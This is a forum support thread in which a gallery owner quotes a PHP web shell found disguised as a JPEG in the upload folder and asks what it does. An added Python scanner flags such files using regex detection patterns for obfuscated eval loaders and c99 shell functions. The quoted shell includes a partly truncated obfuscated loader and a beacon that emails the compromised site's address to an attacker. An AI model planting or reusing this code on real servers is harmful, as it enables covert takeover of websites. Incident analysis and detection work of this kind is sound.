forum.coppermine-gallery.net

Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: toke on December 03, 2010, 10:05:27 am

Title: gallery exploited - php shell?
Post by: toke on December 03, 2010, 10:05:27 am
Hello,

Today I was downloading a backup, and when I zipped it up with 7-Zip my antivirus went off and I found this file was in /gallery/userpics/so_php.jpg

Code:
<?PHP
             //Authentication
$login = ""; //Login
$pass = "";  //Pass
$md5_pass = "d0929b176456727f564dc6281ad4d722"; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCB[...........to long, had to cut it out. ill upload txt file...................]2OCB6Gds5T7dJIsm2wrS+Y/O19dCsltUVCNIAWIIgeFb//eeff/79z/8A')));

<?
// sh3ll.us & no-shell.net
// shell4spam@gmail.com
// shell4spam@gmail.com
$site = "www.Sh3ll.Us";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
    $to = "fofo-303@hotmail.com";
    $subject = "EGFM";
    $header = "from: EGFM <fofo-303@hotmail.com>";
    $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
    $message .= "Path : " . __file__;
    $sentmail = @mail($to, $subject, $message, $header);
    
    echo "";
    exit;
}
?>
</body></html><?php chdir($lastdir); c99shexit(); ?>

I am about to upgrade to 1.5; however, I would like to know what this code did.

Title: Re: gallery exploited - php shell?
Post by: Brooklyn on December 04, 2010, 10:44:53 am
http://forum.coppermine-gallery.net/index.php/topic,51927.0.html
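
One way to sweep an upload folder such as /gallery/userpics/ for files like the one quoted in the first post, as an added example that is not part of the original thread and is not Coppermine code. The names `scan_upload` and `scan_tree` are hypothetical, the sample bytes are constructed, and the markers are taken from the lines visible in the quoted file.

```python
import re
from pathlib import Path

# Leading bytes of the image types a gallery upload folder should contain.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}
# Markers visible in the file quoted in the first post.
PHP_MARKERS = {
    "php-open-tag": re.compile(rb"<\?php", re.I),
    "eval-gzinflate-base64": re.compile(
        rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode", re.I),
    "c99-shell-function": re.compile(rb"c99sh\w*\s*\(", re.I),
}

def scan_upload(name, data):
    """Return the reasons a file with an image extension looks like PHP."""
    findings = []
    magic = IMAGE_MAGIC.get(Path(name).suffix.lower())
    if magic and not data.startswith(magic):
        findings.append("not-an-image")  # extension says image, header does not
    findings += [label for label, rx in PHP_MARKERS.items() if rx.search(data)]
    return findings

def scan_tree(root):
    """Scan every file with an image extension under root; return {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in IMAGE_MAGIC:
            found = scan_upload(path.name, path.read_bytes())
            if found:
                hits[str(path)] = found
    return hits

# Constructed samples (not the real payload): the opening of the quoted file,
# a clean JPEG header, and a JPEG header with a PHP tag embedded after it.
SAMPLES = {
    "so_php.jpg": b"<?PHP\n$md5_pass = \"x\";\neval(gzinflate(base64_decode('AAAA')));",
    "holiday.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32,
    "avatar.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00<?php /* constructed */ ?>",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, scan_upload(name, data) or "clean")
```

The third sample shows why a header check alone is not enough: the file starts with valid JPEG bytes, so only the content scan flags it.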